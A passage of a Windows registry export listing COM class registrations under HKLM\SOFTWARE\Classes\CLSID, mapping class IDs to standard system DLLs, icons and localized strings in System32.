REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{782FC20A-81CF-43DE-A625-072155BCD30C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{78317482-5b49-4093-9c34-2758fc63bef0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7849596a-48ea-486e-8937-a2a3009f31a9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{788B686B-EA20-41CD-A018-1BFD506194B2}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{78A683B3-A5CE-484D-9559-221D1CB45EC5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\CleanPCCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{78DE489B-7931-4f14-83B4-C56D38AC9FFA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{78fe669a-186e-4108-96e9-77b586c1332f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\query.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7924BBA8-1913-4B0E-8E6F-6F45CE499731}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wbem\nlmcim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7946ede1-839d-49be-9c1d-27c44529e093}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7970614A-BD82-439E-A828-CC96F8E91428}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{797A9BB1-9E49-4e63-AFE1-1B45B9DC8162}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{79834058-0A20-44dc-AD9B-CE07DC6E379C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmcsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7988B571-EC89-11cf-9C00-00AA00A14F56}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dskquota.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7998DC37-D3FE-487C-A60A-7701FCC70CC6}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\repdrvfs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{79C43ADB-A429-469F-AA39-2F2B74B75937}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SensorsApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{79CEEEBE-BDE0-4C05-9D92-155F78BB7D2B}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\activationclient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{79DBA461-677B-448A-8A5E-3006DABAF6F9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{79DEA627-A08A-43AC-8EF5-6900B9299126}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\directmanipulation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A076CE1-4B31-452a-A4F1-0304C8738100} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\netcenter.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A076CE1-4B31-452a-A4F1-0304C8738100}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\imageres.dll,-178 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A076CE1-4B31-452a-A4F1-0304C8738100}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A0F6AB7-ED84-46B6-B47E-02AA159A152B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7a54bbed-bb9b-425a-8bd7-1a5410923dcf}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A56C4CB-D678-4188-85A8-BA2EF68FA10D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A63D67D-014E-4f5f-AE9D-CC0C1FE16DAC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A80E4A8-8005-11D2-BCF8-00C04F72C717}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7a872d34-bc6b-4f83-b199-22e9c0a91ddc}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\credprovhost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\netplwiz.dll,-102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7aa7790d-75d7-484b-98a1-3913d022091d} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-28702 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7aa7790d-75d7-484b-98a1-3913d022091d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7AA809F6-C072-11DF-AC23-18A90531A85A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhengine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7AA809F7-C072-11DF-AC23-18A90531A85A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhengine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7AA809F8-C072-11DF-AC23-18A90531A85A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhengine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7AAE5B4F-488C-419b-95E2-923F2AA70FFD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7abbbcca-e01b-4560-8228-92e1eedbc908}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7AFA253E-F823-42f6-A5D9-714BDE467412}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7afb974e-3842-4106-a702-82a13e088f46}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B014A0C-A42A-4268-BFE0-AFCA9745CD53}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LocationApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B0C11A0-2FAF-40d4-9FE5-28FA27C85442}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B134486-8B58-4802-A6AE-1A5E708DBCC6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B19A919-A9D6-49E5-BD45-02C34E4E4CD5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B31547E-EF7E-479b-9494-2216DC179E61}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7b40792d-05ff-44c4-9058-f440c71f17d4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mintdh.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7b4a83b6-f704-4b77-8e3d-c6087e3a21d2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B5A12E8-0C60-4939-A046-11CF879B19FB}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlandlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7b81be6a-ce2b-4676-a29e-eb907a5126c5} InfoTip REG_EXPAND_SZ @%systemroot%\system32\appwiz.cpl,-160#immutable1 LocalizedString REG_EXPAND_SZ @%systemroot%\system32\appwiz.cpl,-159#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7b81be6a-ce2b-4676-a29e-eb907a5126c5}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-87 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7b81be6a-ce2b-4676-a29e-eb907a5126c5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B82D688-3B9E-4090-8ECD-FC84E454C923}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msvproc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B90DAE3-4AD0-4F0D-BE80-A26B296C3156}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7b9e38b0-a97c-11d0-8534-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7BA4C740-9E81-11CF-99D3-00AA004AE837}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7bce3cfb-954c-438f-974c-73a8e0593f1a}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\provsvc.dll,-102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\imageres.dll,-1013 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7BF2A436-2A30-4797-90EE-0F66B8426D75}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C127AC8-EC8D-40f2-91D0-B791CFC2397B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C28841A-AB97-498e-98C4-F6F143366FBC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WLanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C3269CC-95B0-41C7-BCD7-F96640883669}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\configmanager2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C48D08B-0DA5-4BA4-9C6E-4BB65DEB2005}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C50E1E9-DB15-4410-89C5-D27F4B727368}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CredProvHelper.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C606A3F-8AA8-4E36-92D6-2B6AFEC0B732}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\pmcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7c61d0a6-af7e-483a-b705-d2c5c2264656}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7c67eb93-8eff-4e48-889f-45ba299bc46f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7c83c056-1d0d-4c8e-a6b0-89e79c213559}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\oobe\SetupCleanupTask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7cacbd7b-0d99-468f-ac33-22e495c0afe5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7cd3c903-d2e9-4a4d-8af3-3025445b24bf}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7D3195FF-A16A-43c3-9E50-E8A0975B234C}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\BthpanContextHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7DB7A939-E5C8-4eaa-B3E0-43CE04CAFFBE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sdcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7db875bd-1b88-4c5f-9e4c-ed23eaff24e1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7DE95A91-6443-4749-AFC4-AC4EEDCD4421}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7df2cfcd-6c09-415a-ae9d-5263f4964cbb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7DF8EF76-D449-485f-B4EB-58DC96B31EDB} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\pnidui.dll,-605 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7DF8EF76-D449-485f-B4EB-58DC96B31EDB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgprint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7E08E268-CD23-4E97-B433-AB31D5BFB6AE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7E3FCEA1-31B4-11D2-AE1F-0080C7337EA1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7E45546F-6D52-4D10-B702-9C2E67232E62}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7E4A23E2-B969-4761-BE35-1A8CED58E323}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\XpsServices.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7e57f418-1f71-4411-9e09-45884f4f4714}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7E66DBEF-2474-4E82-919B-9A855F4C2FE8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wscproxystub.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7e99c0a3-f935-11d2-ba96-00c04fb6d0d1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7EAD5C10-8B3F-11E6-AE22-56B6B6499611}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\bnmanager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7EB5FBE4-2100-49E6-8593-17E130122F91}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7ECEAD6D-6452-4DED-B567-7BB9947D7669}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7ED25D63-48E5-4BE3-8539-3040B0B8991C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7EFA68C6-086B-43e1-A2D2-55A113531240}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7F00FA1E-9820-47B1-9C4F-8701F1432177}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7F12E753-FC71-43D7-A51D-92F35977ABB5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7F1899DA-62A6-11D0-A2C6-00C04FD909DD}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7F43B400-1A0E-4D57-BBC9-6B0C65F7A889}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\catsrvps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7F598975-37E0-4A67-A992-116680F0CEDA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprvsd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7F72CC7A-74A0-45B4-909C-14FB8186DD7E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmipdfs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7f8e7858-c362-4c0a-b868-4cdd929da715}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\authui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7FB1D98A-F895-4761-8DC2-774969C84D10}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\WMIPJOBJ.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7febaf7c-18cf-11d2-993f-00a0c91f3880}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{80009818-f38f-4af1-87b5-eadab9433e58}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807e5a10-4856-4f9a-8e3c-a1f7e75648b3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8086ebd4-43e3-4b19-beb3-f0ea4ecf319c}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sdiagnhost.exe ServerExecutable REG_EXPAND_SZ %SystemRoot%\System32\sdiagnhost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8099904b-0b91-4906-a89d-11de2bd8f737}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{809fee14-1687-41d3-b333-5c2572c743c5}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DdcComImplementationsDesktop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{80c68d96-366b-11dc-9eaa-00161718cf63}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{80CB8C11-0E10-45F4-A1BA-EAD3838D7034}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\vdsvd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{80F3F1D5-FECA-45F3-BC32-752C152E456E} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\tabletpc.cpl,-10102 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\tabletpc.cpl,-10100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{80F3F1D5-FECA-45F3-BC32-752C152E456E}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\tabletpc.cpl,-10200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{80F3F1D5-FECA-45F3-BC32-752C152E456E}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\tabletpc.cpl @1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{80F94176-FCCC-11D2-B991-00C04F8ECD78}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{81007291-f070-4c4f-b978-ad1bec84babc}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{811F592B-CDE7-4ca4-A6D4-7BB3F60AD8FB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{81218F10-A8AA-44C4-9436-33A42C3852E9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{812F944A-C5C8-4CD9-B0A6-B3DA802F228D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UIAnimation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8135397C-5C6C-4f6b-8E93-30685615F4EA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmcsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{814B9800-1C88-11D1-BAD9-00609744111A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\vbisurf.ax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{814B9801-1C88-11D1-BAD9-00609744111A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\vbisurf.ax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{815509B5-2940-4287-83DD-13EA06E181DD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8168e74a-b39f-46d8-adcd-7bed477b80a3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MemoryDiagnostic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{81796171-DF5F-4F1B-A80C-BE4715D3C6BB}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\spsreng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{817F98C4-C9D9-4B8F-B8D0-413C8E5DBBB7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\clbcatq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{819d1334-9d74-4254-9ac8-dc745ebc5386}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{81b43e73-e814-4dcd-a7c6-e22e7fe6a029}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{820825FD-1358-4705-8FEB-56B5CEE8BFD5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WLanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{823B8267-735C-477E-8151-0FA9ADC8AB3A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{82569ac2-3564-4f80-b3c5-cfd842e40d2d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\CspProxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8278F931-2A3E-11d2-838F-00C04FD918D0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{827b7a93-2c48-433e-b247-8e3be20aab4a}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{82BD0E67-9FEA-4748-8672-D5EFE5B779B0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wincredui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{82c588e7-e54b-408c-9f8c-6af9adf6f1e9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{82d792e9-8f8c-4f4a-9dbf-06253e4562a8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{83267d9b-a70d-469d-bab0-c4e3181209d1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\srmscan.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8336e323-2e6a-4a04-937c-548f681839b3}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{833A69FB-5E17-4893-85A5-1EF469217372}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WlanRadioManager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{83472593-4fe6-4f44-a14c-fc8d4b4ff3f5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{836CD085-B3D3-4b5c-BBCB-224F35EB0CCD}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpnprv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8373ce97-72b7-4fb2-b5e8-b38aa083d734}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSyncProviders.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{838A77A6-14D4-439C-925F-30EE58005026}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\comuid.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{83B52078-E93E-425B-926F-DE6169875E41}\InProcServer32 (Default) 